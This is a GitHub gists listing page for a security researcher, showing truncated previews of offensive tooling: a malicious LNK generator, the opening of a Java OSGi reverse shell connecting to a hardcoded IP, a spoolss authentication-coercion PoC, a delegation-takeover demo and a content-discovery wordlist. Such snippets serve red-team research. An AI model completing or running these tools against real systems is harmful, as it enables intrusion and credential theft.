Steve Borosh rvrsh3ll
rvrsh3ll
/ Create-LNK.ps1
Created
October 27, 2017 14:22
— forked from enigma0x3/Create-LNK.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Create-LNKPayload{ | |
| <# | |
| .SYNOPSIS | |
| Generates a malicous LNK file | |
| .PARAMETER LNKName | |
| Name of the LNK file you want to create. |
rvrsh3ll
/ converter.sh
Created
May 27, 2018 23:10
— forked from xdavidhu/converter.sh
Converter.sh, a bash script to convert domain lists to resolved IP lists without duplicates
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Converter.sh by @xdavidhu | |
| # This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix | |
| # With this script, you can convert domain lists to resolved IP lists without duplicates. | |
| # Usage: ./converter.sh [domain-list-file] [output-file] | |
| echo -e "[+] Converter.sh by @xdavidhu\n" | |
| if [ -z "$1" ] || [ -z "$2" ]; then | |
| echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]" | |
| exit 1 | |
| fi |
rvrsh3ll
/ ExampleActivatorReverseShell.Java
Created
June 20, 2018 15:34
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package com.rvrsh3ll.osgi.shellme; | |
| import org.osgi.framework.BundleActivator; | |
| import org.osgi.framework.BundleContext; | |
| import java.io.IOException; | |
| import java.io.InputStream; | |
| import java.io.OutputStream; | |
| import java.net.Socket; | |
| public class Activator implements BundleActivator { | |
| public void start(BundleContext context) throws Exception { | |
| String host="192.168.13.134"; |
rvrsh3ll
/ Get-CIDRCount.ps1
Created
January 15, 2019 08:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Get-CidrHostCount { | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Mandatory)] | |
| [ValidateRange(1,32)] | |
| $Cidr | |
| ) | |
| Begin { | |
| } # End Begin. |
rvrsh3ll
/ dementor.py
Created
January 16, 2019 13:55
— forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| # some code from https://www.exploit-db.com/exploits/2879/ | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /safebrowsing/rd/CltOb12nLW1IbHehcmUtd2hUdmFzEBAY7-0KIOkUDC7h2,/safebrowsing/rd/CINnu27nLO8hbHdfgmUtc2ihdmFyEAcY4|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
rvrsh3ll
/ rbcd_demo.ps1
Created
April 6, 2019 14:38
— forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
rvrsh3ll
/ content_discovery_all.txt
Created
March 16, 2019 22:52
— forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ` | |
| ~/ | |
| ~ | |
| ×™× | |
| ___ | |
| __ | |
| _ | |
| --- |
rvrsh3ll
/ LoadXSLFromMem.cs
Created
June 9, 2019 17:49
— forked from TheWover/LoadXSLFromMem.cs
Loads XSL files from memory (or disk) using the Microsoft.XMLDOM COM object.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Reflection; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| namespace TryCOMXSLLoad | |
| { | |
| class Program |
rvrsh3ll
/ change_network.sh
Created
July 9, 2019 23:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "" > /etc/network/interfaces | |
| sed -i 's/false/true/' /etc/NetworkManager/NetworkManager.conf | |
| service network-manager restart |